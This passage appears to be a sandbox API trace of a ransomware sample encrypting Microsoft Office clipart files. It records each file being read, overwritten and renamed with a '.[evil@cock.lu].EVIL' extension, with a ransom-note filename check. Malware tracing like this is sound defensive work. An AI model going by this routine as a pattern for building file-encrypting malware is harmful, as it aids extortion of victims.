lpNumberOfBytesRead=0x84b0fdd7a0*=0x3f34, lpOverlapped=0x0) returned 1 [0108.534] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.534] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.534] _errno () returned 0x84b1160840 [0108.534] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.534] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x3f40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3f40, lpOverlapped=0x0) returned 1 [0108.534] CloseHandle (hObject=0x1a8) returned 1 [0108.534] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.535] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.535] __uncaught_exception () returned 0x84b1160800 [0108.535] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.535] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf.[evil@cock.lu].evil")) returned 1 [0108.536] ??_V@YAXPEAX@Z () returned 0x1 [0108.538] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF", dwFileAttributes=0x200) returned 0 [0108.538] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.538] wcsstr (_Str="BD05119_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.538] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 69 [0108.538] wcscmp (_String1="BD05119_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.538] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD05119_.WMF") returned 0x0 [0108.538] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 0x45 [0108.539] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.540] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4354, lpOverlapped=0x0) returned 1 [0108.543] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.543] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.543] _errno () returned 0x84b1160840 [0108.543] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.543] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4360, lpOverlapped=0x0) returned 1 [0108.543] CloseHandle (hObject=0x1a8) returned 1 [0108.543] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.543] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.543] __uncaught_exception () returned 0x84b1160800 [0108.543] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.543] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf.[evil@cock.lu].evil")) returned 1 [0108.544] ??_V@YAXPEAX@Z () returned 0x1 [0108.547] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF", dwFileAttributes=0x200) returned 0 [0108.547] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.547] wcsstr (_Str="BD06102_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.547] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 69 [0108.547] wcscmp (_String1="BD06102_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.547] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD06102_.WMF") returned 0x0 [0108.547] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 0x45 [0108.547] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.549] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3ef0, lpOverlapped=0x0) returned 1 [0108.559] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.559] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.559] _errno () returned 0x84b1160840 [0108.559] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.559] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3f00, lpOverlapped=0x0) returned 1 [0108.559] CloseHandle (hObject=0x1a8) returned 1 [0108.559] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.560] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.560] __uncaught_exception () returned 0x84b1160800 [0108.560] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.560] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf.[evil@cock.lu].evil")) returned 1 [0108.561] ??_V@YAXPEAX@Z () returned 0x1 [0108.564] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF", dwFileAttributes=0x200) returned 0 [0108.564] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.564] wcsstr (_Str="BD06200_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.564] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 69 [0108.564] wcscmp (_String1="BD06200_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.564] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD06200_.WMF") returned 0x0 [0108.564] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 0x45 [0108.564] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.566] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4124, lpOverlapped=0x0) returned 1 [0108.585] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.585] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.585] _errno () returned 0x84b1160840 [0108.585] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.585] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x4140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4140, lpOverlapped=0x0) returned 1 [0108.586] CloseHandle (hObject=0x1a8) returned 1 [0108.586] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.586] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.587] __uncaught_exception () returned 0x84b1160800 [0108.587] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.587] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf.[evil@cock.lu].evil")) returned 1 [0108.588] ??_V@YAXPEAX@Z () returned 0x1 [0108.593] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF", dwFileAttributes=0x200) returned 0 [0108.594] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.594] wcsstr (_Str="BD07761_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.594] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 69 [0108.594] wcscmp (_String1="BD07761_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.594] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD07761_.WMF") returned 0x0 [0108.594] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 0x45 [0108.594] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.596] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x687c, lpOverlapped=0x0) returned 1 [0108.694] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.694] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.694] _errno () returned 0x84b1160840 [0108.694] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.694] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x6880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6880, lpOverlapped=0x0) returned 1 [0108.694] CloseHandle (hObject=0x1a8) returned 1 [0108.695] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.695] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.695] __uncaught_exception () returned 0x84b1160800 [0108.695] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.695] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf.[evil@cock.lu].evil")) returned 1 [0108.696] ??_V@YAXPEAX@Z () returned 0x1 [0108.700] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF", dwFileAttributes=0x200) returned 0 [0108.700] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.700] wcsstr (_Str="BD07804_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.700] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 69 [0108.700] wcscmp (_String1="BD07804_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.700] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD07804_.WMF") returned 0x0 [0108.700] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 0x45 [0108.700] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.703] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x133c, lpOverlapped=0x0) returned 1 [0108.740] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.740] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.740] _errno () returned 0x84b1160840 [0108.740] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.740] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1340, lpOverlapped=0x0) returned 1 [0108.741] CloseHandle (hObject=0x1a8) returned 1 [0108.741] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.741] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.741] __uncaught_exception () returned 0x84b1160800 [0108.741] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.742] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf.[evil@cock.lu].evil")) returned 1 [0108.742] ??_V@YAXPEAX@Z () returned 0x1 [0108.747] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF", dwFileAttributes=0x200) returned 0 [0108.747] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.747] wcsstr (_Str="BD07831_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.747] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 69 [0108.747] wcscmp (_String1="BD07831_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.747] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD07831_.WMF") returned 0x0 [0108.747] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 0x45 [0108.747] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.750] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfe2, lpOverlapped=0x0) returned 1 [0108.823] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.823] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.823] _errno () returned 0x84b1160840 [0108.823] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.823] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1000, lpOverlapped=0x0) returned 1 [0108.823] CloseHandle (hObject=0x1a8) returned 1 [0108.823] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.824] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.824] __uncaught_exception () returned 0x84b1160800 [0108.824] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.824] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf.[evil@cock.lu].evil")) returned 1 [0108.825] ??_V@YAXPEAX@Z () returned 0x1 [0108.829] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF", dwFileAttributes=0x200) returned 0 [0108.829] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.829] wcsstr (_Str="BD08758_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.829] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 69 [0108.829] wcscmp (_String1="BD08758_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.829] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD08758_.WMF") returned 0x0 [0108.829] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 0x45 [0108.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.831] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5f00, lpOverlapped=0x0) returned 1 [0108.849] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.850] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.850] _errno () returned 0x84b1160840 [0108.850] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.850] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x5f20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5f20, lpOverlapped=0x0) returned 1 [0108.850] CloseHandle (hObject=0x1a8) returned 1 [0108.850] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.851] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.851] __uncaught_exception () returned 0x84b1160800 [0108.851] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.851] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf.[evil@cock.lu].evil")) returned 1 [0108.852] ??_V@YAXPEAX@Z () returned 0x1 [0108.855] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF", dwFileAttributes=0x200) returned 0 [0108.856] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.856] wcsstr (_Str="BD08773_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.856] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 69 [0108.856] wcscmp (_String1="BD08773_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.856] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BD08773_.WMF") returned 0x0 [0108.856] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 0x45 [0108.856] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.858] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x60ca, lpOverlapped=0x0) returned 1 [0108.868] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.868] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.868] _errno () returned 0x84b1160840 [0108.868] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.868] WriteFile (in: 